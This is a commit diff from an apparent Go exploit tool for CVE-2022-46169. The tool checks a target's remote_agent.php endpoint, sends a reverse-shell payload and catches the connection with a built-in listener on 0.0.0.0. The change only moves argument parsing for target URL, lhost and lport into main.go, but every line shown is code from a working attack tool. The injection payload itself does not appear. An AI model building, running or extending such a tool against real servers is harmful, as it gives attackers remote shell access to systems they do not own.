used a global flag system

internal/exploiter/exploiter.go

@@ -7,8 +7,6 @@ import (
 	"net/http"
 	"net/url"
 	"strings"
-
-	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/cmd"
 )
 
 func checkVuln(vulnUrl string) bool {
@@ -111,12 +109,7 @@ func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) {
 	defer resp.Body.Close()
 }
 
-func Exploit() {
-	urlTarget, lhost, lport := cmd.GetArguments()
-	if urlTarget == "" || lhost == "" || lport == "" {
-		return
-	}
-
+func Exploit(urlTarget string, lhost string, lport string) {
 	vulnURL := urlTarget + "/remote_agent.php"
 	fmt.Println("Checking...")
 	if checkVuln(vulnURL) {

internal/listener/listener.go

@@ -5,8 +5,6 @@ import (
 	"io"
 	"net"
 	"os"
-
-	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/cmd"
 )
 
 func handleConnection(conn net.Conn) {
@@ -63,9 +61,7 @@ func startListener(lhost, lport string) {
 	}
 }
 
-func Listen() {
-	_, _, lport := cmd.GetArguments()
-
+func Listen(lport string) {
 	// listen on everything, lazy
 	lhost := "0.0.0.0"
 

main.go

@@ -3,16 +3,22 @@ package main
 import (
 	"time"
 
+	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/cmd"
 	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/exploiter"
 	"git.vomitblood.com/Vomitblood/cve-2022-46169/internal/listener"
 )
 
 func main() {
-	go listener.Listen()
+	urlTarget, lhost, lport := cmd.GetArguments()
+	if urlTarget == "" || lhost == "" || lport == "" {
+		return
+	}
+
+	go listener.Listen(lport)
 
 	time.Sleep(1 * time.Second)
 
-	exploiter.Exploit()
+	exploiter.Exploit(urlTarget, lhost, lport)
 
 	// prevent the main goroutine from exiting immediately
 	select {}